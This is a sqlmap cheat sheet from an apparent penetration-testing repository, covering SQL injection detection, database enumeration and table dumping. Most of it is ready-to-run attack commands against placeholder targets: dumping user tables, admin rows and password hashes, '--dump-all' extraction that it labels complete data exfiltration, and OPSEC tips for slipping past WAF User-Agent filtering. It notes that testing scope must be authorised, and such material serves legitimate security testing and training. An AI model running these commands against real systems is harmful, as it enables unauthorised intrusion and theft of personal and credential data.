daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sqlmap-cheat-sheet-sql-injection-testing-data-extraction.md (19414B)


      1 ---
      2 title: "sqlmap Cheat Sheet - SQL Injection Testing & Data Extraction"
      3 description: "sqlmap -u \"http://target.com/page.php?id=1\""
      4 category: exploitation
      5 tags: ["exploitation", "sql-injection"]
      6 tools: ["Hashcat", "John", "SQLMap"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Exploitation/sqlmap Cheat Sheet - SQL Injection Testing & Data Extraction.md"
     10 ---
     11 # Basic GET parameter test
     12 sqlmap -u "http://target.com/page.php?id=1"
     13 ```
     14 *Tests the `id` parameter for SQL injection using default detection techniques*
     15 
     16 ```bash
     17 # Non-interactive mode (auto-answer prompts)
     18 sqlmap -u "http://target.com/page.php?id=1" --batch
     19 ```
     20 *Automatically accepts default answers to all prompts for unattended scanning*
     21 
     22 ```bash
     23 # POST data test
     24 sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" --batch
     25 ```
     26 *Tests POST parameters in request body (common for login forms)*
     27 
     28 ```bash
     29 # Cookie-based test (requires --level 2+)
     30 sqlmap -u "http://target.com/dashboard.php" --cookie="PHPSESSID=abc123; user=admin" --level=2 --batch
     31 ```
     32 *Tests cookie values for SQL injection (requires elevated test level)*
     33 
     34 ```bash
     35 # Test from Burp request file
     36 sqlmap -r request.txt --batch
     37 ```
     38 *Loads full HTTP request from file (preserves headers, body, method)*
     39 
     40 ```bash
     41 # Test specific parameter only
     42 sqlmap -u "http://target.com/page.php?id=1&name=test" -p id --batch
     43 ```
     44 *Focuses testing on the `id` parameter, ignoring `name`*
     45 
     46 ---
     47 
     48 ### Options & Flags
     49 
     50 | Flag | Purpose |
     51 |:---|:---|
     52 | **-u URL** | Target URL with parameters |
     53 | **--data="param=val&param2=val2"** | POST body data |
     54 | **--cookie="name=value; name2=value2"** | Cookie values (semicolon separator) |
     55 | **-p PARAM** | Test only this parameter |
     56 | **-r FILE** | Load HTTP request from file (e.g., from Burp) |
     57 | **--batch** | Never ask for user input (accept defaults) |
     58 | **--level=N** | Test depth 1–5 (default 1; cookies at 2+, User-Agent/Referer at 3+) |
     59 | **--risk=N** | Payload aggressiveness 1–3 (default 1; higher = more destructive/false positives) |
     60 | **--technique=BEUST** | Limit injection techniques (B=boolean-blind, E=error, U=union, S=stacked, T=time-blind, Q=inline) |
     61 | **--random-agent** | Randomise User-Agent header |
     62 | **--threads=N** | Concurrent requests (default 1) |
     63 | **--dbms=DBMS** | Force DBMS type (MySQL, PostgreSQL, MSSQL, Oracle, etc.) |
     64 | **--flush-session** | Ignore saved session data, start fresh |
     65 | **--parse-errors** | Display DBMS error messages from responses |
     66 | **-t FILE** | Log all HTTP traffic to file |
     67 
     68 ---
     69 
     70 ### Practical Examples
     71 
     72 ```bash
     73 # Quick GET test with auto-defaults
     74 sqlmap -u "http://example.com/product.php?id=5" --batch
     75 ```
     76 *Standard automated scan with default settings*
     77 
     78 ```bash
     79 # POST login form test, faster with threads
     80 sqlmap -u "http://example.com/login.php" --data="user=admin&pass=1234" --batch --threads=5
     81 ```
     82 *Accelerates testing using 5 concurrent threads*
     83 
     84 ```bash
     85 # Cookie test with increased level and risk
     86 sqlmap -u "http://example.com/dashboard.php" --cookie="sessionid=xyz789" --level=3 --risk=2 --batch
     87 ```
     88 *Deeper testing including User-Agent/Referer headers with more aggressive payloads*
     89 
     90 ```bash
     91 # Test from Burp capture, limit to UNION/error techniques
     92 sqlmap -r burp_request.txt --technique=UE --batch
     93 ```
     94 *Faster testing by excluding time-based blind techniques*
     95 
     96 ```bash
     97 # Force MySQL DBMS, randomise User-Agent
     98 sqlmap -u "http://example.com/search.php?q=test" --dbms=MySQL --random-agent --batch
     99 ```
    100 *Skips DBMS fingerprinting and evades basic User-Agent filtering*
    101 
    102 ```bash
    103 # Test only 'id' parameter, exclude time-based (faster)
    104 sqlmap -u "http://example.com/item.php?id=10&cat=2" -p id --technique=BEU --batch
    105 ```
    106 *Targeted test on single parameter without slow time-based blind payloads*
    107 
    108 ---
    109 
    110 ### Output Interpretation
    111 
    112 | Output | Meaning |
    113 |:---|:---|
    114 | **parameter 'X' is vulnerable** | SQL injection confirmed in parameter X |
    115 | **parameter appears to be injectable** | High confidence of vulnerability |
    116 | **Injection type** | Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries |
    117 | **DBMS fingerprint** | MySQL 5.x, PostgreSQL 9.x, MSSQL 2012, etc. |
    118 | **Payload** | Successful injection payload displayed |
    119 | **all tested parameters do not appear to be injectable** | No vulnerability detected; try `--level=5 --risk=3` |
    120 | **Session saved** | Results cached; re-run skips already-tested parameters unless `--flush-session` used |
    121 | **Output location** | Results saved to `~/.local/share/sqlmap/output/` (newer Kali) or `~/.sqlmap/output/` (older Kali) |
    122 
    123 ---
    124 
    125 ### OPSEC & Detection Considerations
    126 
    127 1. **High request volume**: sqlmap generates numerous requests, easily detected by IDS/IPS/WAF
    128 2. **User-Agent signature**: Default `sqlmap/1.x` header is fingerprinted by WAFs; use `--random-agent`
    129 3. **Time-based blind delays**: Causes deliberate 5–10 sec delays per test; use `--technique=BEU` to exclude
    130 4. **Log traces**: Visible in web server access logs, application logs, database logs, WAF/SIEM alerts
    131 5. **Obvious SQL patterns**: Payloads contain `' OR 1=1`, `UNION SELECT`, `SLEEP()` signatures
    132 6. **No stealth mode**: Use `--delay`, `--threads=1`, `--random-agent` for basic noise reduction (still detectable)
    133 
    134 ---
    135 
    136 ### Common Errors & Solutions
    137 
    138 | Error | Solution |
    139 |:---|:---|
    140 | **unable to connect to target URL or proxy** | Check network; WAF may be blocking; try `--random-agent`, `--delay=2` |
    141 | **parameter appears to be not injectable** | Increase detection: `--level=5 --risk=3`; try specific `--technique`; verify manually |
    142 | **all tested parameters do not appear to be injectable** | Increase `--level` and `--risk`; check for WAF; try `--tamper` scripts |
    143 | **connection timed out** | Use `--timeout=30`, `--retries=3`, `--technique=BEU`, `--threads=1`, `--disable-precon` |
    144 | **heuristic test shows parameter might not be injectable** | Warning only; sqlmap continues testing; safe to ignore if parameter is vulnerable |
    145 
    146 ---
    147 
    148 ### Version & Platform Notes
    149 
    150 1. Kali Linux ships with sqlmap 1.9+ (stable as of Jan 2025)
    151 2. Update: `sudo apt update && sudo apt install sqlmap`
    152 3. Run as: `sqlmap` (no `python sqlmap.py` needed on Kali)
    153 4. Cookie testing requires `--level=2` minimum
    154 5. User-Agent/Referer testing requires `--level=3`
    155 6. Python 2.x support deprecated but still works; Python 3.x recommended
    156 
    157 ---
    158 
    159 ## sqlmap Database Enumeration
    160 
    161 **Purpose**: Enumerate databases, current DB, current user, DBMS version/banner after SQL injection is confirmed
    162 
    163 **Prerequisites**:
    164 1. SQL injection already identified (run detection first)
    165 2. sqlmap session saved (or re-run with injection URL)
    166 3. Network access to target
    167 4. Authorised testing scope
    168 
    169 ---
    170 
    171 ### Core Commands
    172 
    173 ```bash
    174 # List all databases
    175 sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
    176 ```
    177 *Retrieves names of all accessible databases on DBMS*
    178 
    179 ```bash
    180 # Show current database
    181 sqlmap -u "http://target.com/page.php?id=1" --current-db --batch
    182 ```
    183 *Identifies which database the application is currently using*
    184 
    185 ```bash
    186 # Show current user
    187 sqlmap -u "http://target.com/page.php?id=1" --current-user --batch
    188 ```
    189 *Reveals DBMS user account running the queries*
    190 
    191 ```bash
    192 # List all database users
    193 sqlmap -u "http://target.com/page.php?id=1" --users --batch
    194 ```
    195 *Enumerates all DBMS user accounts*
    196 
    197 ```bash
    198 # Retrieve DBMS banner
    199 sqlmap -u "http://target.com/page.php?id=1" --banner --batch
    200 ```
    201 *Obtains DBMS version and build information*
    202 
    203 ```bash
    204 # List tables in specific database
    205 sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
    206 ```
    207 *Shows all tables within specified database*
    208 
    209 ```bash
    210 # List columns in specific table
    211 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
    212 ```
    213 *Retrieves column names and data types for specified table*
    214 
    215 ```bash
    216 # Exclude system databases from enumeration
    217 sqlmap -u "http://target.com/page.php?id=1" --dbs --exclude-sysdbs --batch
    218 ```
    219 *Filters out `information_schema`, `mysql`, `sys`, `performance_schema`*
    220 
    221 ---
    222 
    223 ### Options & Flags
    224 
    225 | Flag | Purpose |
    226 |:---|:---|
    227 | **--dbs** | Enumerate all databases |
    228 | **--current-db** | Retrieve current database name |
    229 | **--current-user** | Retrieve current DBMS user |
    230 | **--users** | Enumerate all DBMS users |
    231 | **--passwords** | Enumerate password hashes for users |
    232 | **--privileges** | Enumerate user privileges |
    233 | **--banner** | Retrieve DBMS version banner |
    234 | **-D DATABASE** | Specify target database |
    235 | **--tables** | Enumerate tables (requires `-D`) |
    236 | **-T TABLE** | Specify target table |
    237 | **--columns** | Enumerate columns (requires `-D` and `-T`) |
    238 | **--exclude-sysdbs** | Skip system databases |
    239 | **--schema** | Enumerate entire DBMS schema |
    240 | **--count** | Retrieve row count for table |
    241 | **-a** or **--all** | Retrieve everything (very slow) |
    242 
    243 ---
    244 
    245 ### Practical Examples
    246 
    247 ```bash
    248 # Full enumeration workflow: databases → tables → columns
    249 sqlmap -u "http://example.com/product.php?id=5" --dbs --batch
    250 sqlmap -u "http://example.com/product.php?id=5" -D webapp --tables --batch
    251 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --columns --batch
    252 ```
    253 *Standard three-step reconnaissance process*
    254 
    255 ```bash
    256 # Quick context: current DB and user
    257 sqlmap -u "http://example.com/product.php?id=5" --current-db --current-user --batch
    258 ```
    259 *Fast initial reconnaissance of application database context*
    260 
    261 ```bash
    262 # List only user-created databases (exclude system DBs)
    263 sqlmap -u "http://example.com/product.php?id=5" --dbs --exclude-sysdbs --batch
    264 ```
    265 *Focuses on application databases, ignoring DBMS internals*
    266 
    267 ```bash
    268 # Enumerate users and their privileges
    269 sqlmap -u "http://example.com/product.php?id=5" --users --privileges --batch
    270 ```
    271 *Identifies potential privilege escalation paths*
    272 
    273 ```bash
    274 # Get DBMS version and current database
    275 sqlmap -u "http://example.com/product.php?id=5" --banner --current-db --batch
    276 ```
    277 *Combined fingerprinting and context gathering*
    278 
    279 ```bash
    280 # Count rows in 'orders' table before dumping
    281 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T orders --count --batch
    282 ```
    283 *Assesses data volume before committing to full extraction*
    284 
    285 ---
    286 
    287 ### Output Interpretation
    288 
    289 | Output | Meaning |
    290 |:---|:---|
    291 | **Databases** | List of database names (e.g., `information_schema`, `mysql`, `webapp`, `testdb`) |
    292 | **Current DB** | Single database name the application uses (e.g., `webapp`) |
    293 | **Current user** | DBMS user running queries (e.g., `webapp_user@localhost`, `root@%`) |
    294 | **Tables** | List of table names in specified database |
    295 | **Columns** | Column names with data types (e.g., `id INT`, `username VARCHAR(50)`, `password_hash CHAR(64)`) |
    296 | **Users** | DBMS user accounts (e.g., `root`, `admin`, `webapp_user`) |
    297 | **Privileges** | User permissions (e.g., `SELECT`, `INSERT`, `FILE`, `SUPER`) |
    298 | **Banner** | DBMS version (e.g., `MySQL 5.7.33-0ubuntu0.16.04.1`) |
    299 | **Row count** | Number of rows in table (e.g., `12,543 entries`) |
    300 
    301 ---
    302 
    303 ### OPSEC & Detection Considerations
    304 
    305 1. **High query volume**: Each enumeration step generates multiple queries; logged in DB and web server
    306 2. **Enumeration queries stand out**: `SELECT schema_name FROM information_schema.schemata`, `SHOW TABLES`, etc. are obvious reconnaissance
    307 3. **Time-based enumeration slowest**: Can take minutes per table; use `--technique=BEU` to exclude time-based
    308 4. **System DB enumeration**: Querying `information_schema`, `mysql`, `sys` generates alerts in mature SOCs
    309 5. **Repeated session reuse**: sqlmap saves session; re-running doesn't re-test injection but still generates enumeration traffic
    310 
    311 ---
    312 
    313 ### Common Errors & Solutions
    314 
    315 | Error | Solution |
    316 |:---|:---|
    317 | **unable to retrieve tables for database 'X'** | Insufficient privileges; try different database or check `--privileges` |
    318 | **unable to retrieve column names for table 'X'** | Table may not exist or access denied; verify with `--tables` first |
    319 | **Session confusion** | Use `--flush-session` to start fresh |
    320 | **Timeout during enumeration** | Use `--threads=1`, `--technique=BEU`, `--timeout=30` for unstable connections |
    321 | **No results for --current-db** | Injection may be blind and slow; wait or try `--technique=U` (UNION-based is faster) |
    322 
    323 ---
    324 
    325 ### Version & Platform Notes
    326 
    327 1. Enumeration syntax consistent across sqlmap 1.x versions
    328 2. DBMS-specific differences: MySQL uses `information_schema`, MSSQL uses `sysobjects`, PostgreSQL uses `pg_catalog`; sqlmap handles automatically
    329 3. Column data types vary by DBMS (e.g., MySQL `VARCHAR`, PostgreSQL `CHARACTER VARYING`, MSSQL `NVARCHAR`)
    330 
    331 ---
    332 
    333 ## sqlmap Table Dumping & Data Extraction
    334 
    335 **Purpose**: Extract data (rows, columns, tables) from target database after enumeration
    336 
    337 **Prerequisites**:
    338 1. SQL injection confirmed
    339 2. Database and table names known (from enumeration phase)
    340 3. Sufficient DBMS privileges (typically `SELECT`)
    341 4. Network access and authorised scope
    342 
    343 ---
    344 
    345 ### Core Commands
    346 
    347 ```bash
    348 # Dump entire table
    349 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
    350 ```
    351 *Extracts all rows and columns from specified table*
    352 
    353 ```bash
    354 # Dump specific columns only
    355 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name -C column1,column2 --dump --batch
    356 ```
    357 *Selective extraction (comma-separated, no spaces)*
    358 
    359 ```bash
    360 # Dump first 100 rows
    361 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --start=0 --stop=100 --batch
    362 ```
    363 *Paginated extraction (0-indexed, exclusive stop)*
    364 
    365 ```bash
    366 # Dump rows matching condition
    367 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --where="id>1000" --batch
    368 ```
    369 *Conditional extraction using SQL WHERE clause*
    370 
    371 ```bash
    372 # Dump all tables in database
    373 sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump --batch
    374 ```
    375 *Extracts entire database (can be very slow)*
    376 
    377 ```bash
    378 # Dump all databases (extremely slow)
    379 sqlmap -u "http://target.com/page.php?id=1" --dump-all --exclude-sysdbs --batch
    380 ```
    381 *Complete data exfiltration excluding system databases*
    382 
    383 ---
    384 
    385 ### Options & Flags
    386 
    387 | Flag | Purpose |
    388 |:---|:---|
    389 | **--dump** | Extract data from table(s) |
    390 | **-D DATABASE** | Specify database (required) |
    391 | **-T TABLE** | Specify table (required unless dumping all) |
    392 | **-C COL1,COL2** | Dump only specified columns (comma-separated, no spaces) |
    393 | **--start=N** | First row to dump (0-indexed) |
    394 | **--stop=N** | Last row to dump (exclusive) |
    395 | **--first=N** | First character to retrieve per column entry |
    396 | **--last=N** | Last character to retrieve per column entry |
    397 | **--where="condition"** | SQL WHERE clause for conditional dump (e.g., `"id>100"`, `"date>'2024-01-01'"`) |
    398 | **--dump-all** | Dump entire DBMS (all databases and tables) |
    399 | **--exclude-sysdbs** | Skip system databases when using `--dump-all` |
    400 | **--dump-format=FORMAT** | Output format: `CSV` (default), `HTML`, `SQLITE` |
    401 | **--count** | Get row count before dumping |
    402 | **--output-dir=DIR** | Custom output directory |
    403 
    404 ---
    405 
    406 ### Practical Examples
    407 
    408 ```bash
    409 # Dump 'users' table from 'webapp' database
    410 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --batch
    411 ```
    412 *Standard full table extraction*
    413 
    414 ```bash
    415 # Dump only 'username' and 'email' columns
    416 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users -C username,email --dump --batch
    417 ```
    418 *Targeted extraction minimising data exfiltration footprint*
    419 
    420 ```bash
    421 # Dump first 50 users
    422 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --start=0 --stop=50 --batch
    423 ```
    424 *Quick sample of table contents*
    425 
    426 ```bash
    427 # Dump admin users only (conditional)
    428 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --where="role='admin'" --batch
    429 ```
    430 *Filtered extraction based on column value*
    431 
    432 ```bash
    433 # Count rows before dumping large table
    434 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T logs --count --batch
    435 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T logs --dump --start=0 --stop=1000 --batch
    436 ```
    437 *Assessment before committing to extraction*
    438 
    439 ```bash
    440 # Dump all user-created databases (exclude system DBs, very slow)
    441 sqlmap -u "http://example.com/product.php?id=5" --dump-all --exclude-sysdbs --batch
    442 ```
    443 *Complete data exfiltration (can take hours)*
    444 
    445 ---
    446 
    447 ### Output Interpretation
    448 
    449 | Output | Meaning |
    450 |:---|:---|
    451 | **Dumped data location** | `~/.local/share/sqlmap/output/<target>/dump/` (Kali Linux) |
    452 | **CSV format** | Default; files named `<database>/<table>.csv` |
    453 | **Console output** | sqlmap prints table to terminal in ASCII table format |
    454 | **Empty results** | Table may be empty or WHERE condition matches no rows |
    455 | **Partial dumps** | `--start`/`--stop` limits shown; re-run with different ranges for more data |
    456 | **Password hashes** | sqlmap automatically detects hashes and offers to crack |
    457 | **Row count** | `Table 'users' dumped to CSV file (42 entries)` indicates number of rows extracted |
    458 
    459 ---
    460 
    461 ### OPSEC & Detection Considerations
    462 
    463 1. **Extremely noisy**: Dumping generates hundreds to thousands of queries per table
    464 2. **Data exfiltration signatures**: Large `SELECT` result sets trigger DLP/SIEM alerts
    465 3. **Time-based blind slowest**: Can take hours for large tables; exclude with `--technique=BEU`
    466 4. **Logs everywhere**: Web server access logs, application logs, database query logs, network traffic captures
    467 5. **Automated cracking prompts**: sqlmap detects password hashes and asks to crack; answer `N` to skip or use `--batch`
    468 6. **No stealth mode**: sqlmap prioritises speed over stealth; data extraction is inherently detectable
    469 
    470 ---
    471 
    472 ### Common Errors & Solutions
    473 
    474 | Error | Solution |
    475 |:---|:---|
    476 | **unable to retrieve entries for table 'X'** | Access denied or table doesn't exist; verify with `--tables` and check `--privileges` |
    477 | **connection reset by peer during dump** | Large result set or unstable connection; use `--threads=1`, dump in chunks with `--start`/`--stop` |
    478 | **Timeout errors on large tables** | Use `--timeout=60`, `--technique=BEU`, dump in smaller chunks |
    479 | **Out-of-memory errors** | Dumping millions of rows; use `--start`/`--stop` to paginate |
    480 | **WHERE clause syntax errors** | Use single quotes inside double quotes: `--where="name='admin'"` (not `--where='name="admin"'`) |
    481 | **No output for --dump** | Check `--count` first to verify rows exist; verify `-D` and `-T` are correct |
    482 
    483 ---
    484 
    485 ### Version & Platform Notes
    486 
    487 1. sqlmap 1.9+ (Jan 2025) default output: `~/.local/share/sqlmap/output/` on Kali Linux
    488 2. Older versions: `~/.sqlmap/output/`
    489 3. CSV format default; HTML/SQLITE available with `--dump-format`
    490 4. Password hash cracking requires separate tools ([hashcat](https://hashcat.net/hashcat/), [John the Ripper](https://www.openwall.com/john/)); sqlmap detects but doesn't crack inline by default in `--batch` mode
    491 
    492 ---
    493 
    494 ## References
    495 
    496 1. [sqlmap GitHub Repository](https://github.com/sqlmapproject/sqlmap)
    497 2. [sqlmap Official Website](https://sqlmap.org)
    498 3. [sqlmap Usage Wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
    499 4. [sqlmap Features Documentation](https://github.com/sqlmapproject/sqlmap/wiki/Features)
    500 5. [Burp Suite](https://portswigger.net/burp)
    501 6. [hashcat](https://hashcat.net/hashcat/)
    502 7. [John the Ripper](https://www.openwall.com/john/)
    503 
    504 ---
    505 
    506 #sqlmap #SQLi #WebAppSec #DatabaseEnum #DataExfiltration #PenetrationTesting #Kali #SQLInjection #AutomatedTesting